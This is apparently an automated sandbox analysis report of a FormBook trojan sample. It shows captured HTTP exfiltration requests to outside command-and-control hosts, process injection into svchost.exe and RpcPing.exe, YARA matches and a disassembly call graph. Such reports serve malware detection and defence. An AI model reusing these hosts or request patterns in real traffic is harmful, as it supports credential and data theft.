                                                                      Data Raw: 46 32 3d 58 2b 34 4b 50 56 34 76 6a 79 46 4e 38 52 72 6b 52 69 70 76 4f 36 47 33 42 49 6b 6e 57 66 54 36 36 61 37 78 6c 42 61 61 76 35 43 41 45 6a 7a 4f 79 43 69 76 36 46 64 57 77 65 2f 30 6c 2f 57 4f 32 57 33 44 45 48 68 73 76 7a 41 79 36 4d 46 67 4b 7a 6e 32 76 43 52 72 6d 68 66 50 6a 63 46 44 78 55 6a 41 49 35 32 69 56 6c 32 33 6c 53 78 47 55 75 31 4e 68 53 71 39 56 5a 6a 46 73 6a 56 6f 2f 6a 48 41 71 6c 56 6d 44 59 76 37 4c 30 76 66 5a 78 6d 67 70 35 6a 4f 62 67 4b 79 56 30 39 4b 6a 6b 55 45 46 30 55 73 63 4e 71 37 6c 6f 48 35 42 31 63 78 47 67 37 6c 6a 76 68 48 52 36 36 30 4d 53 52 33 72 6a 45 3d
                                                                      Data Ascii: F2=X+4KPV4vjyFN8RrkRipvO6G3BIknWfT66a7xlBaav5CAEjzOyCiv6FdWwe/0l/WO2W3DEHhsvzAy6MFgKzn2vCRrmhfPjcFDxUjAI52iVl23lSxGUu1NhSq9VZjFsjVo/jHAqlVmDYv7L0vfZxmgp5jObgKyV09KjkUEF0UscNq7loH5B1cxGg7ljvhHR660MSR3rjE=


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      26192.168.2.850003156.242.132.82805284C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 7, 2024 15:29:31.204077959 CET770OUTPOST /b6g5/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.shanhaiguan.net
                                                                      Origin: http://www.shanhaiguan.net
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 223
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.shanhaiguan.net/b6g5/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Data Raw: 46 32 3d 58 2b 34 4b 50 56 34 76 6a 79 46 4e 38 78 62 6b 54 42 42 76 66 61 47 30 45 49 6b 6e 64 2f 54 2b 36 61 33 78 6c 41 75 77 76 4c 6d 41 45 44 44 4f 67 32 57 76 33 6c 64 57 34 2b 2f 39 34 50 57 52 32 57 72 4c 45 48 64 73 76 7a 55 79 36 4a 35 67 4a 45 4c 31 74 53 52 70 70 42 66 4e 73 38 46 44 78 55 6a 41 49 35 6a 4a 56 6c 75 33 69 6d 31 47 55 4c 42 43 2b 69 71 2b 53 5a 6a 46 6f 6a 56 73 2f 6a 48 75 71 6c 6c 4d 44 65 6a 37 4c 78 44 66 61 67 6d 6a 6e 35 6a 49 45 77 4c 77 46 6d 39 46 72 6d 30 61 4a 31 51 63 51 37 69 4f 74 2b 71 54 62 58 55 33 46 67 54 4f 6a 73 4a 78 55 4e 6e 63 57 78 42 48 31 30 54 2f 48 65 6e 2b 32 4a 72 76 66 49 57 42 57 56 66 54 62 54 72 37
                                                                      Data Ascii: F2=X+4KPV4vjyFN8xbkTBBvfaG0EIknd/T+6a3xlAuwvLmAEDDOg2Wv3ldW4+/94PWR2WrLEHdsvzUy6J5gJEL1tSRppBfNs8FDxUjAI5jJVlu3im1GULBC+iq+SZjFojVs/jHuqllMDej7LxDfagmjn5jIEwLwFm9Frm0aJ1QcQ7iOt+qTbXU3FgTOjsJxUNncWxBH10T/Hen+2JrvfIWBWVfTbTr7


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      27192.168.2.850004156.242.132.82805284C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 7, 2024 15:29:33.862226009 CET1787OUTPOST /b6g5/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.shanhaiguan.net
                                                                      Origin: http://www.shanhaiguan.net
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 1239
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.shanhaiguan.net/b6g5/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Data Raw: 46 32 3d 58 2b 34 4b 50 56 34 76 6a 79 46 4e 38 78 62 6b 54 42 42 76 66 61 47 30 45 49 6b 6e 64 2f 54 2b 36 61 33 78 6c 41 75 77 76 4c 75 41 45 77 4c 4f 78 68 4b 76 32 6c 64 57 37 2b 2f 77 34 50 58 4e 32 57 7a 50 45 48 51 62 76 77 73 79 72 62 42 67 64 67 66 31 33 43 52 70 69 68 66 4f 6a 63 46 61 78 55 7a 4d 49 35 7a 4a 56 6c 75 33 69 67 5a 47 54 65 31 43 34 69 71 39 56 5a 6a 5a 73 6a 55 78 2f 6a 50 59 71 6b 52 32 57 2b 44 37 4c 52 54 66 57 79 4f 6a 76 35 6a 4b 48 77 4c 53 46 6d 77 46 72 6d 70 6c 4a 31 6b 6c 51 38 6d 4f 38 49 62 33 4e 56 59 53 47 79 37 4b 6b 62 46 78 63 76 37 74 54 33 5a 53 33 55 7a 45 42 2f 57 51 77 61 6e 2f 51 61 6e 76 44 6a 6a 5a 57 54 54 7a 71 39 4e 30 64 6e 59 6b 4d 34 31 52 64 2b 37 53 5a 68 2f 44 62 77 47 73 57 64 41 36 70 4b 52 34 4f 76 36 48 75 68 63 53 67 76 65 4e 75 2f 73 41 31 72 4f 36 30 64 34 38 47 54 78 6e 66 41 6b 59 2f 70 6e 78 5a 30 6c 45 48 5a 48 43 4b 65 46 52 42 6f 36 42 62 2f 63 59 4b 30 2b 36 6e 66 4c 32 51 33 30 75 63 37 50 39 35 34 31 31 79 34 56 6b 2f 41 78 [TRUNCATED]
                                                                      Data Ascii: F2=X+4KPV4vjyFN8xbkTBBvfaG0EIknd/T+6a3xlAuwvLuAEwLOxhKv2ldW7+/w4PXN2WzPEHQbvwsyrbBgdgf13CRpihfOjcFaxUzMI5zJVlu3igZGTe1C4iq9VZjZsjUx/jPYqkR2W+D7LRTfWyOjv5jKHwLSFmwFrmplJ1klQ8mO8Ib3NVYSGy7KkbFxcv7tT3ZS3UzEB/WQwan/QanvDjjZWTTzq9N0dnYkM41Rd+7SZh/DbwGsWdA6pKR4Ov6HuhcSgveNu/sA1rO60d48GTxnfAkY/pnxZ0lEHZHCKeFRBo6Bb/cYK0+6nfL2Q30uc7P95411y4Vk/Ax4rOf7T07WYVQXtbVX4sLbU9lGxgqyuxBUEiXClwge0LMT8sbSN5OLOV7RlF/dXDSXPPxfbAywFxLFDlLzQx6T7voTqUx2FJ+lRZQ0ZUvRY2l9N3oHEvkyRUvhQNITls/tGw2dvIHku6ezjpiVnLnXkK7i1SnlzfcSRvXrSCSRBGryUDH+dHgh2+kSvomEb/t15nimXrwejR85j8PrUa9BQoZDSL/MBbW3YJ1xxfhLMO9OIcDn+EbCGO5K53ANfu6X8RP8iusWfV208L+jccGieheY1OYsPvNJ0/SqRKI9H03d4vSsmOCy1k9mhy85y3ENHcJHVsK7oH7goGJ85Nja3o4Axs7BLfJ9vqZYlVFQTWkHAcHmcCqNVapMXWjFcd4g2s9VaU82lvaLZZtjrxcBWuq0Wb5wS53sodPS1JQqFeAzBJ02Xvguwt1wAKC1WlpVJ2V/4Xiq+qniPYwQxfiZ3iAMOtoNWCQ9E2/Sx3RW8DBGVG2e/yzh4mjwigcLhYU52pY007FQ8CtdkHwhU7GHSifQwMfC5/zFt8q+9+qkZlOv7ENOA9ya7G4WEuTZB6FpDH3MGov2so/FMlOF2CPL3D/rnGHDy5/DoKg6AhZ2hDTiMXIYUKM+Yy707KHpqvYroH30PCxf5FIBhmwMt/zi7exrYTj9+9zzn [TRUNCATED]


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      28192.168.2.850005156.242.132.82805284C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 7, 2024 15:29:36.401371002 CET485OUTGET /b6g5/?F2=a8QqMioE13Jt2iPiOClkfJLiI6soJM7xy7KAtya8ruOCNgqe2jC0xyltzPPw7ePD7gDMaG5P8Bx9i7otBFrS2CJxsBKcruwu6mzHCImmdlnckGZwJuxb62mJXIzJiBU08Q==&sHS=543hApwHD HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.shanhaiguan.net
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      29192.168.2.85000684.32.84.32805284C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 7, 2024 15:29:58.063930988 CET747OUTPOST /n2dv/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.es-lidl.online
                                                                      Origin: http://www.es-lidl.online
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 203
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.es-lidl.online/n2dv/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Data Raw: 46 32 3d 57 4d 77 50 58 6b 67 50 2f 35 70 36 57 43 2f 4b 6c 76 75 78 4b 4d 31 4a 7a 39 51 77 4c 47 41 68 32 35 62 42 51 4c 4e 5a 54 55 6b 69 6c 51 35 4f 4a 41 55 32 31 33 4b 59 50 30 62 78 71 79 37 58 4d 52 2b 43 64 67 77 79 46 66 30 61 69 4a 44 71 79 74 30 6d 68 63 4c 51 2f 65 56 42 47 64 4f 63 47 36 57 53 70 5a 2b 66 61 4c 68 63 35 58 4c 47 70 4d 59 57 7a 30 76 4b 76 39 36 34 37 74 33 4f 32 42 6a 4e 6e 2b 4d 78 6d 65 2f 76 66 44 69 76 37 42 6d 68 6f 61 64 39 42 76 44 71 65 4f 6e 6f 55 33 74 66 5a 61 7a 48 4f 70 4a 70 32 4a 4c 43 46 6b 69 39 32 73 39 67 6e 75 54 38 52 64 39 39 65 65 4b 73 43 65 34 3d
                                                                      Data Ascii: F2=WMwPXkgP/5p6WC/KlvuxKM1Jz9QwLGAh25bBQLNZTUkilQ5OJAU213KYP0bxqy7XMR+CdgwyFf0aiJDqyt0mhcLQ/eVBGdOcG6WSpZ+faLhc5XLGpMYWz0vKv9647t3O2BjNn+Mxme/vfDiv7Bmhoad9BvDqeOnoU3tfZazHOpJp2JLCFki92s9gnuT8Rd99eeKsCe4=


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      30192.168.2.85000784.32.84.3280
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 7, 2024 15:30:01.793606043 CET767OUTPOST /n2dv/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.es-lidl.online
                                                                      Origin: http://www.es-lidl.online
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 223
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.es-lidl.online/n2dv/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Data Raw: 46 32 3d 57 4d 77 50 58 6b 67 50 2f 35 70 36 45 53 50 4b 6a 4f 75 78 4e 73 31 4b 32 39 51 77 51 57 41 6c 32 35 48 42 51 4f 30 43 53 69 55 69 6c 78 4a 4f 62 31 30 32 32 33 4b 59 45 55 62 77 30 43 37 63 4d 52 6a 33 64 69 6b 79 46 62 6b 61 69 4a 7a 71 7a 65 4d 68 6e 4d 4c 57 7a 2b 56 35 62 74 4f 63 47 36 57 53 70 5a 36 68 61 4c 35 63 35 6e 58 47 71 75 67 52 2b 55 75 34 2f 4e 36 34 77 4e 33 43 32 42 6a 56 6e 39 49 49 6d 63 48 76 66 48 71 76 37 54 4f 75 69 61 63 34 46 76 44 31 52 4f 69 77 5a 32 39 33 63 4a 6e 59 51 6f 4a 50 7a 2f 6d 6f 66 47 71 37 31 73 56 4c 6e 74 37 4b 55 71 67 56 45 39 61 63 63 4a 76 32 68 64 43 6c 67 47 4d 53 33 57 31 46 42 6e 55 53 36 4d 38 66
                                                                      Data Ascii: F2=WMwPXkgP/5p6ESPKjOuxNs1K29QwQWAl25HBQO0CSiUilxJOb10223KYEUbw0C7cMRj3dikyFbkaiJzqzeMhnMLWz+V5btOcG6WSpZ6haL5c5nXGqugR+Uu4/N64wN3C2BjVn9IImcHvfHqv7TOuiac4FvD1ROiwZ293cJnYQoJPz/mofGq71sVLnt7KUqgVE9accJv2hdClgGMS3W1FBnUS6M8f


                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      Click to dive into process behavior distribution

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Target ID:0
                                                                      Start time:09:26:54
                                                                      Start date:07/11/2024
                                                                      Path:C:\Users\user\Desktop\xBzBOQwywT.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\xBzBOQwywT.exe"
                                                                      Imagebase:0x400000
                                                                      File size:1'332'289 bytes
                                                                      MD5 hash:715EC2A53173921888B38C9731AD9BC9
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:2
                                                                      Start time:09:27:02
                                                                      Start date:07/11/2024
                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\xBzBOQwywT.exe"
                                                                      Imagebase:0xb10000
                                                                      File size:46'504 bytes
                                                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1804925513.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1804925513.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1809587289.00000000056F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1809587289.00000000056F0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1808701497.0000000003590000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1808701497.0000000003590000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:4
                                                                      Start time:09:27:16
                                                                      Start date:07/11/2024
                                                                      Path:C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe"
                                                                      Imagebase:0xa00000
                                                                      File size:140'800 bytes
                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3365349150.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3365349150.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:5
                                                                      Start time:09:27:17
                                                                      Start date:07/11/2024
                                                                      Path:C:\Windows\SysWOW64\RpcPing.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\SysWOW64\RpcPing.exe"
                                                                      Imagebase:0xf40000
                                                                      File size:26'624 bytes
                                                                      MD5 hash:F7DD5764D96A988F0CF9DD4813751473
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3356645004.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3356645004.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3365351743.00000000009E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3365351743.00000000009E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3360236201.0000000000880000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3360236201.0000000000880000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                      Reputation:moderate
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:6
                                                                      Start time:09:27:30
                                                                      Start date:07/11/2024
                                                                      Path:C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe"
                                                                      Imagebase:0xa00000
                                                                      File size:140'800 bytes
                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3367695283.0000000004CE0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3367695283.0000000004CE0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:10
                                                                      Start time:09:27:43
                                                                      Start date:07/11/2024
                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                      Imagebase:0x7ff6d20e0000
                                                                      File size:676'768 bytes
                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Disassembly

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:3.6%
                                                                        Dynamic/Decrypted Code Coverage:1.2%
                                                                        Signature Coverage:10.2%
                                                                        Total number of Nodes:2000
                                                                        Total number of Limit Nodes:35
                                                                        execution_graph 86196 4010e0 86199 401100 86196->86199 86198 4010f8 86200 401113 86199->86200 86202 401120 86200->86202 86203 401184 86200->86203 86204 40114c 86200->86204 86230 401182 86200->86230 86201 40112c DefWindowProcW 86201->86198 86202->86201 86258 401000 Shell_NotifyIconW __localtime64_s 86202->86258 86237 401250 86203->86237 86205 401151 86204->86205 86206 40119d 86204->86206 86208 401219 86205->86208 86209 40115d 86205->86209 86211 4011a3 86206->86211 86212 42afb4 86206->86212 86208->86202 86215 401225 86208->86215 86213 401163 86209->86213 86214 42b01d 86209->86214 86210 401193 86210->86198 86211->86202 86221 4011b6 KillTimer 86211->86221 86222 4011db SetTimer RegisterWindowMessageW 86211->86222 86253 40f190 10 API calls 86212->86253 86218 42afe9 86213->86218 86219 40116c 86213->86219 86214->86201 86257 4370f4 52 API calls 86214->86257 86269 468b0e 74 API calls __localtime64_s 86215->86269 86255 40f190 10 API calls 86218->86255 86219->86202 86225 401174 86219->86225 86220 42b04f 86259 40e0c0 86220->86259 86252 401000 Shell_NotifyIconW __localtime64_s 86221->86252 86222->86210 86223 401204 CreatePopupMenu 86222->86223 86223->86198 86254 45fd57 65 API calls __localtime64_s 86225->86254 86230->86201 86231 42afe4 86231->86210 86232 42b00e 86256 401a50 328 API calls 86232->86256 86233 4011c9 PostQuitMessage 86233->86198 86236 42afdc 86236->86201 86236->86231 86238 401262 __localtime64_s 86237->86238 86239 4012e8 86237->86239 86270 401b80 86238->86270 86239->86210 86241 40128c 86242 4012d1 KillTimer SetTimer 86241->86242 86243 4012bb 86241->86243 86244 4272ec 86241->86244 86242->86239 86245 4012c5 86243->86245 86246 42733f 86243->86246 86247 4272f4 Shell_NotifyIconW 86244->86247 86248 42731a Shell_NotifyIconW 86244->86248 86245->86242 86249 427393 Shell_NotifyIconW 86245->86249 86250 427348 Shell_NotifyIconW 86246->86250 86251 42736e Shell_NotifyIconW 86246->86251 86247->86242 86248->86242 86249->86242 86250->86242 86251->86242 86252->86233 86253->86210 86254->86236 86255->86232 86256->86230 86257->86230 86258->86220 86261 40e0e7 __localtime64_s 86259->86261 86260 40e142 86262 40e184 86260->86262 86368 4341e6 63 API calls __wcsicoll 86260->86368 86261->86260 86263 42729f DestroyIcon 86261->86263 86265 40e1a0 Shell_NotifyIconW 86262->86265 86266 4272db Shell_NotifyIconW 86262->86266 86263->86260 86267 401b80 54 API calls 86265->86267 86268 40e1ba 86267->86268 86268->86230 86269->86231 86271 401b9c 86270->86271 86291 401c7e 86270->86291 86292 4013c0 86271->86292 86274 42722b LoadStringW 86277 427246 86274->86277 86275 401bb9 86297 402160 86275->86297 86311 40e0a0 86277->86311 86278 401bcd 86280 427258 86278->86280 86281 401bda 86278->86281 86315 40d200 52 API calls 2 library calls 86280->86315 86281->86277 86282 401be4 86281->86282 86310 40d200 52 API calls 2 library calls 86282->86310 86285 427267 86286 401bf3 __localtime64_s _wcscpy _wcsncpy 86285->86286 86287 42727b 86285->86287 86290 401c62 Shell_NotifyIconW 86286->86290 86316 40d200 52 API calls 2 library calls 86287->86316 86289 427289 86290->86291 86291->86241 86317 4115d7 86292->86317 86298 426daa 86297->86298 86299 40216b _wcslen 86297->86299 86355 40c600 86298->86355 86302 402180 86299->86302 86303 40219e 86299->86303 86301 426db5 86301->86278 86354 403bd0 52 API calls moneypunct 86302->86354 86305 4013a0 52 API calls 86303->86305 86306 4021a5 86305->86306 86308 426db7 86306->86308 86309 4115d7 52 API calls 86306->86309 86307 402187 _memmove 86307->86278 86309->86307 86310->86286 86312 40e0b2 86311->86312 86313 40e0a8 86311->86313 86312->86286 86367 403c30 52 API calls _memmove 86313->86367 86315->86285 86316->86289 86319 4115e1 _malloc 86317->86319 86320 4013e4 86319->86320 86322 4115fd std::exception::exception 86319->86322 86331 4135bb 86319->86331 86328 4013a0 86320->86328 86326 41163b 86322->86326 86345 41130a 51 API calls __cinit 86322->86345 86323 411645 86347 418105 RaiseException 86323->86347 86346 4180af 46 API calls std::exception::operator= 86326->86346 86327 411656 86329 4115d7 52 API calls 86328->86329 86330 4013a7 86329->86330 86330->86274 86330->86275 86332 413638 _malloc 86331->86332 86334 4135c9 _malloc 86331->86334 86353 417f77 46 API calls __getptd_noexit 86332->86353 86333 4135d4 86333->86334 86348 418901 46 API calls 2 library calls 86333->86348 86349 418752 46 API calls 7 library calls 86333->86349 86350 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86333->86350 86334->86333 86337 4135f7 RtlAllocateHeap 86334->86337 86340 413624 86334->86340 86343 413622 86334->86343 86337->86334 86338 413630 86337->86338 86338->86319 86351 417f77 46 API calls __getptd_noexit 86340->86351 86352 417f77 46 API calls __getptd_noexit 86343->86352 86345->86326 86346->86323 86347->86327 86348->86333 86349->86333 86351->86343 86352->86338 86353->86338 86354->86307 86356 40c619 86355->86356 86357 40c60a 86355->86357 86356->86301 86357->86356 86360 4026f0 86357->86360 86359 426d7a _memmove 86359->86301 86361 426873 86360->86361 86362 4026ff 86360->86362 86363 4013a0 52 API calls 86361->86363 86362->86359 86364 42687b 86363->86364 86365 4115d7 52 API calls 86364->86365 86366 42689e _memmove 86365->86366 86366->86359 86367->86312 86368->86262 86369 40bd20 86370 428194 86369->86370 86371 40bd2d 86369->86371 86373 40bd43 86370->86373 86375 4281bc 86370->86375 86377 4281b2 86370->86377 86372 40bd37 86371->86372 86392 4531b1 85 API calls 5 library calls 86371->86392 86381 40bd50 86372->86381 86391 45e987 86 API calls moneypunct 86375->86391 86390 40b510 VariantClear 86377->86390 86380 4281ba 86382 426cf1 86381->86382 86383 40bd63 86381->86383 86402 44cde9 52 API calls _memmove 86382->86402 86393 40bd80 86383->86393 86386 40bd73 86386->86373 86387 426cfc 86388 40e0a0 52 API calls 86387->86388 86389 426d02 86388->86389 86390->86380 86391->86371 86392->86372 86394 40bd8e 86393->86394 86398 40bdb7 _memmove 86393->86398 86395 40bded 86394->86395 86396 40bdad 86394->86396 86394->86398 86399 4115d7 52 API calls 86395->86399 86403 402f00 86396->86403 86398->86386 86400 40bdf6 86399->86400 86400->86398 86401 4115d7 52 API calls 86400->86401 86401->86398 86402->86387 86404 402f0c 86403->86404 86405 402f10 86403->86405 86404->86398 86406 4115d7 52 API calls 86405->86406 86407 4268c3 86405->86407 86408 402f51 moneypunct _memmove 86406->86408 86408->86398 86409 425ba2 86414 40e360 86409->86414 86411 425bb4 86430 41130a 51 API calls __cinit 86411->86430 86413 425bbe 86415 4115d7 52 API calls 86414->86415 86416 40e3ec GetModuleFileNameW 86415->86416 86431 413a0e 86416->86431 86418 40e421 _wcsncat 86434 413a9e 86418->86434 86421 4115d7 52 API calls 86422 40e45e _wcscpy 86421->86422 86437 40bc70 86422->86437 86426 40e4a1 _wcscat _wcslen _wcsncpy 86427 40e4a9 86426->86427 86428 401c90 52 API calls 86426->86428 86429 4115d7 52 API calls 86426->86429 86427->86411 86428->86426 86429->86426 86430->86413 86456 413801 86431->86456 86486 419efd 86434->86486 86438 4115d7 52 API calls 86437->86438 86439 40bc98 86438->86439 86440 4115d7 52 API calls 86439->86440 86441 40bca6 86440->86441 86442 40e4c0 86441->86442 86498 403350 86442->86498 86444 40e4cb RegOpenKeyExW 86445 427190 RegQueryValueExW 86444->86445 86446 40e4eb 86444->86446 86447 4271b0 86445->86447 86448 42721a RegCloseKey 86445->86448 86446->86426 86449 4115d7 52 API calls 86447->86449 86448->86426 86450 4271cb 86449->86450 86505 43652f 52 API calls 86450->86505 86452 4271d8 RegQueryValueExW 86453 4271f7 86452->86453 86455 42720e 86452->86455 86454 402160 52 API calls 86453->86454 86454->86455 86455->86448 86457 41389e 86456->86457 86464 41381a 86456->86464 86458 4139e8 86457->86458 86460 413a00 86457->86460 86483 417f77 46 API calls __getptd_noexit 